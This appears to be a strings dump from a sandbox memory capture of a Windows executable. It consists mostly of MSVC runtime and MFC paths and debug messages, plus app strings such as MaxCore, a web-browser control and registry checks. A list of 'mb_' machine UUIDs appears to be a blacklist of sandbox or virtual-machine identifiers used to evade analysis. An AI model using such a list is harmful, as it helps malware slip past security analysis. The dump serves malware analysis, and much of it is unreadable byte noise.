("Invalid MBCS character sequence passed to strftime",0)

("Invalid MBCS character sequence passed into strftime",0)

f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.h

("Corrupted pointer passed to _freea", 0)

f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\atof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wtof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsdup.c

f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c

W_CrtSetReportHook2

strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szExeName, 260, "<program name unknown>")

__crtMessageWindowA

f:\dd\vctools\crt_bld\self_x86\crt\src\fullpath.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fdopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\feoferr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputws.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgets.c

f:\dd\vctools\crt_bld\self_x86\crt\src\clearerr.c

fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0

_CrtSetReportMode

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c

nRptType >= 0 && nRptType < _CRT_ERRCNT

wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")

strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportA

strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")

wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportW

((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))

f:\dd\vctools\crt_bld\self_x86\crt\src\fputwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtod.c

f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), rterrs[tblindx].rterrtxt)

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "\n\n")

strcpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "Runtime Error!\n\nProgram: ")

_NMSG_WRITE

f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c

f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c

WUSER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dtoxtm64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c

f:\dd\vctools\crt_bld\self_x86\crt\src\close.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\write.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\getcwd.c

strcpy_s(resultstr, resultsize, autofos.man)

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c

_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2

f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\open.c

0 && "Only UTF-16 little endian & UTF-8 is supported for reads"

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c

("CRT Logic error during setenv",0)

__crtsetenv

c:\%original file name%.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

#Unable to load mail system support.

%original file name%.exe_1896_rwx_00401000_001E2000:

J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ<=JJJJJJJJJJJ>?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI

j.hTwV

j.hHzV

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlexcept.h

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xdebug

FJN[[[[[_mx$.6>ACINSU]etuv",,:EP_cjs{|*./;DLV_gjy{ -3>>DP^kp FDKWany

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\streambuf

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocnum

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocale

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xiosbase

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\cstringt.h

EQW]]]]]ett{'*02?CCRTam||%-9::HQT]alq"(-1??JSU^ekyy"#$$.=JYgkpt|}#')1=KZ[]]^ksy')6?AGN]`nox'.05=AP^fq{}--68ETW]cqv|}$,79GP]lov'(--;EMVYaly#&'4@FGS\eooq *-03AJQ\]]hllz'

GHIIIIIIKSbqvw(.46BCHPTUXYfr{LKOQ]huw|

BQS`````ln|&-7;DMO[ddrtv'5CGGLTWfu!#' 3<<KZbo{{FRWYamx&2?M\ffoz$(6CGP

IT[_____gvCN]ffqv%,7@LNSW]an|*AMSVXbp{!#034<ACLVXdkr .1=@OT`cky')),

GMQ\\\\\defghno{(-6CRaeix}"&-;EMT`ky|'-1

LX^hhhhhmuxz"$/>HJQVV[\dqx#' 8GHQ]ju%% 9:>?KNVeop| '(39>@ITcpx$%*67CGGUW

N\cmmmmmp{{} 0?CDGMXaht (.<=?ILWZiwyz$/49;DHKMSWdsy(56DGS`mv!LR^eghkxy

NX]fffffjkxzCJXamny|".3:GUbkm| -59ESW

CHKQQQQQVao|#-;IT]iip|)0=DQTZbiiov}ICF

GHIIIIIIKW`oxx %89COO^eenop{$*08FLOPUa

()$^.* ?[]|\-{},:=!

GMQ\\\\\]ijkqqu!)-448AAFHUWZant}.69GMU_fnnwz',,6>?NRajy!/4:FOOT]^apvy"&0

invalid _N_type: %d

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\locale

CHKQQQQQ[dps##%'*./25@JSYekrz>BNZblr! 3?HKZ]hp|)4BPTcrt '5;JJY[iijjx)19FUaoo|*.28;;COXgv%,.<AMOXcdivv

AIP[[[[[^hmns "" 0=>LZiqt!07BGQ[gt"$' 57BEFLXfn|-<DMY`hnv *1;GQYer#;FRY[chlnr{}#.:=FJY]lx)*3AEHW]lt#.<FLRT[_fqt"1>LY^aijw"LKT\^divz'58DLYYY\\_nvz&,9GOPYhkx)15@FST__nu$019>KXguz!#'0456:FS`cr{)888FKR[_mu %,:;JNSVaahhvw!,4>>AAIP\`cklquz!% 2ALST\cqx{ 5BFISSZemox')7<DIOSV^cipv}"08>BKX^_n{#&17?@KKKUdmmq}.7@EOTVZgjv|,6@BJPW\_bir".044<IQ_`hv&47<DNVckq|*038EFQ\

NSTTTTTT_ghhs$1@KN[^dr{)-:IU\kuuw%,49ADGHS_ahqwx$.69FKN]bkz| 1;DEQT\jx$%-1=BGLWcp|-9EIX\ktz"#-8?IP\`bfjmmt (/:EQ]dkns})2>FO^eglqz|"(4:FTU[inpy|#014?@MZhrs"(2:DMZgghpz}&/48=CCOXbo (-02:>HWeq{*-<FKUU[cqx"&'28<EKR_cko{$$:;;?KTcpty"*37;;=DEIT`blw{#0>BFKQZ[hrwx| 0;E

IsWindowsServer

CHKQQQQQZcgmmmmt!),2=FMOZfq}#()3>>>HINXgmw %*7CMZ`kw CELPYcosy),1=HJX`hu&2@@MY]agjjr )8GT[]kp| )45:GG

GHIIIIIIJMX__loruz{&,01@CRT[cpyy!,;;DOP]cmmx'''0>BJXgv%(23@NQW[[`hox'.22

LX^hhhhhou'FGQQYcfhs#&19<BFJVakq %,2@G

GetExternal.cpp

AIP[[[[[abgqrs#(.9GNV[^ggjltx%'456<>CKVWX^hot#)39CFFRTcp $,:GIMNRU]iruuy

GHIIIIIIMVXgu%2<>EFIUdpy)5@JMSS[ioo|$2>K

GHIIIIIIWdlty678CNY\``ehu$3:EM[^ls|%/7:IR`nvv'(,9;DQVelw?EEQSVboy'-2:@OSX]er!#08DPTWakv|(07:HQSVcr

AIP[[[[[abbly"0:GVZ]diw'69GLYZ\dm|'/<=ADP]ggjryz#,9:AIX]_hq (*6?BBGPU_jmn}& 4=DSS\crt!",,,377;DEJKWbiw{"

DSSbbbbbm{!.066;JXbcrt%4:IKNWao{$3?L[[^_

helpJavaScript.cpp

BQS`````cr!(-68GRVWetux ,-9>BCCRT^dmw&5CCMNVajx'5<@EFTZ[fo|,,27<?HST`efqv!(-19EIJV`mxx%&(/3;AEO]fs|(7<BP

GHIIIIIIX_`mmtw! --8BCKUVVep}'6;>GLNT^`dfhtv$ ./49ENYdeory555:IWfss %,

NetBase.cpp

GMQ\\\\\ems#179=?IWbijt} .:APPRTWWes .9FQWeho}$6DO]gkuwz!>BIUYfu#&118AHT\krrz{* .4<DNZ`krx}!!&09DLZ

ERV]]]]]bffo{'./23BLOP[ao{{*66@DMNZeft(DFT__ilxx"),06ABCMZ`cgsz|'/0=HS[emp!!"#$(,59;DJMYdejn{(-4ALUdpzz|$'*9<BDHUciily).7:GQZacfhptw!&./;HWfly)/0<GGS[dhnwx'1?MN[`ffsy

NX]fffffkww".5>MXanooqx!'/8@NP_kx))7?DRacqy!!/0>BESW\^djmx!%*6@KTbbqz$28AFLPSXcrt4=LMVX]hu{,5@BHQ\dls

PictureEx.cpp

c:\logFile.txt

Error opening key.

Key not found.

CheckRegistryKeyExistance

SetStringKey

"exeId":"

inflate 1.1.3 Copyright 1995-1998 Mark Adler

1.1.3

CWebBrowser2

mb_00000000-0000-0000-0807-060504030201

mb_09F005AE-AC9D-4FC1-AB7A-24004F6C043A

mb_01010101-0101-0101-0101-010101010101

mb_58585858-5858-5858-5858-585858585858

mb_4c4c4544-0000-2010-8020-80c04f202020

mb_11111111-2222-3333-4444-555555555555

mb_11111111-1111-1111-1111-111111111111

mb_00020003-0004-0005-0006-000700080009

mb_890E2D14-CACD-45D1-AE66-BC80E8BFEB0F

mb_8E275844-178F-44A8-ACEB-A7D7E5178C63

mb_52309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_DC698397-FA54-4CF2-82C8-B1B5307A6A7F

mb_61F39712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_50FB9712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_93309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_56F49712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_07090201-0103-0301-0807-060504030201

mb_03000200-0400-0500-0006-000700080009

mb_FEFEFEFE-FEFE-FEFE-FEFE-FEFEFEFEFEFE

mb_FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_00000000-0000-0000-0000-000000000000

0.0.0.0

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp

CNotSupportedException

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

m_msgCur = {

m_pszExeName =

m_nCmdShow =

m_lpCmdLine =

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Warning: no message line prompt for ID 0xX.

Warning: OnUpdateKeyIndicator - unknown indicator 0xX.

Warning: scroll bars in frame windows may cause unusual behaviour.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl

CCmdTarget

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp

SENDING control notification %d from control id 0xX to %hs window.

SENDING command id 0xX to %hs target.

No handler for command ID 0xX, disabling it.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp

m_nMsgLast =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp

Error: failed to load message box prompt string 0xx.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp

Warning: unknown WM_MEASUREITEM for menu item 0xX.

hhctrl.ocx

Implementation Warning: control notification = $%X.

Warning: not executing disabled command %d

hWnd = $X (nIDC=$X) is not a %hs.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp

IOleInPlaceObject not supported on OLE control (dialog ID %d).

Persistence not supported on OLE control %ls.

%d. Column ordinal %d: Binding as native data type

%d. Column ordinal %d: Binding a COM object

%d. Column ordinal %d: Binding as an IStream object

%d. Column ordinal %d: Binding as an ISequentialStream object

neither ISequentialStream nor IStream are supported!

IStream is supported

FISequentialStream is supported

Testing streams support...

%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory

%d. Column ordinal %d: Binding length and status ONLY

Number of columns: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h

Unsupported DBTYPE (%d) in column %d

$@Column %d not bound

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp

IGNORING command id 0xX sent to %hs dialog.

Routing command id 0xX to app.

Routing command id 0xX to owner window.

Warning: Creating dialog from within a COleControlModule application is not a supported scenario.

Warning: ExecuteDlgInit failed during dialog init.

ERROR: Dialog with IDD 0xX must have the child style.

ERROR: Dialog with IDD 0xX must be invisible.

ERROR: Cannot find dialog template with IDD 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp

Error: no data exchange control with ID 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp

m_ps.rcPaint =

m_ps.fErase =

m_ps.hdc =

lgpn.lopnColor =

lgpn.lopnWidth.x (width) =

lgpn.lopnStyle =

lb.lbColor =

lb.lbHatch =

lb.lbStyle =

lf.lfFaceName =

lf.lfPitchAndFamily =

lf.lfQuality =

lf.lfClipPrecision =

lf.lfOutPrecision =

lf.lfCharSet =

lf.lfStrikeOut =

lf.lfUnderline =

lf.lfItalic =

lf.lfWeight =

lf.lfOrientation =

lf.lfEscapement =

lf.lfWidth =

lf.lfHeight =

bm.bmBitsPixel =

bm.bmPlanes =

bm.bmWidthBytes =

bm.bmWidth =

bm.bmHeight =

bm.bmType =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp

CHttpConnection

CHttpFile

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\inet.cpp

Unknown status: %d

Internet ctxt=%d:

Warning: throwing CInternetException for error %d

Warning: Extended error reported with no response info

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp

Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp

WM_HOTKEY

WM_SETHOTKEY

WM_IDLEUPDATECMDUI

WM_DDE_EXECUTE

WM_KEYLAST

WM_SYSKEYUP

WM_SYSKEYDOWN

WM_KEYUP

WM_KEYDOWN

WM_VKEYTOITEM

WM_CTLCOLORMSGBOX

WM_USER 0xX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp

Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.

Warning: failed to reclaim %d bytes for memory safety pool.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp

Error: failed to load AfxFormatString string 0xx.

Error: illegal string index requested %d.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp

a %hs object at $%p, %u bytes long

an invalid object at $%p, %u bytes long

faulted while dumping object at $%p, %u bytes long

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp

m_bz.hTask =

m_bz.hResource =

m_bz.lpszTemplate =

m_bz.hInstance =

m_bz.lCustData =

m_bz.lpszCaption =

m_bz.hWndOwner =

m_bz.dwFlags =

m_bz.cbStruct =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c

f:\dd\vctools\crt_bld\self_x86\crt\src\streambuf

f:\dd\vctools\crt_bld\self_x86\crt\src\xlocale

f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c

%s_%0x

%s(%d) :

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c

Client hook allocation failure at file %hs line %d.

Memory allocated at %hs(%d).

Client hook re-allocation failure at file %hs line %d.

HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory after end of heap buffer.

HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory before start of heap buffer.

CRT detected that the application wrote to a heap buffer that was freed.

crt block at 0x%p, subtype %x, %Iu bytes long.

client block at 0x%p, subtype %x, %Iu bytes long.

%hs(%d) :

#File Error#(%d) :

Data: <%s> %s

f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\threadex.c

_CrtDbgReport: String too long or IO Error

Debug %s!

Program: %s%s%s%s%s%s%s%s%s%s%s%s

f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c

%s(%d) : %s

_CrtDbgReport: String too long or Invalid characters in String

f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c

This is an unsupported way to load Visual C   DLLs. You need to modify your application to build with a manifest.

- Attempt to initialize the CRT more than once.

- CRT not initialized

Please contact the application's support team for more information.

- floating point support not loaded

f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c

GetProcessWindowStation

f:\dd\vctools\crt_bld\self_x86\crt\src\output.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\drive.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c

ADVAPI32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\read.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c

USER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c

portuguese-brazilian

f:\dd\vctools\crt_bld\self_x86\crt\src\convrtcp.c

operator

Run-Time Check Failure #%d - %s

%s%s%s%s

%s%s%p%s%ld%s%d%s

user32.dll

f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c

MSPDB80.DLL

RegCloseKey

RegOpenKeyExA

f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp

MaxCore.cpp

.?AVCCmdTarget@@

MaxCoreDlg.cpp

.?AVCWebBrowser2@@

.?AVExecuteBase@@

.?AVExecuteFacade@@

Idispimp.cpp

.PAVCInternetException@@

.PAVCFileException@@

Text.cpp

.PAVCOleException@@

.PAVCException@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCArchiveException@@

.?AVCHttpConnection@@

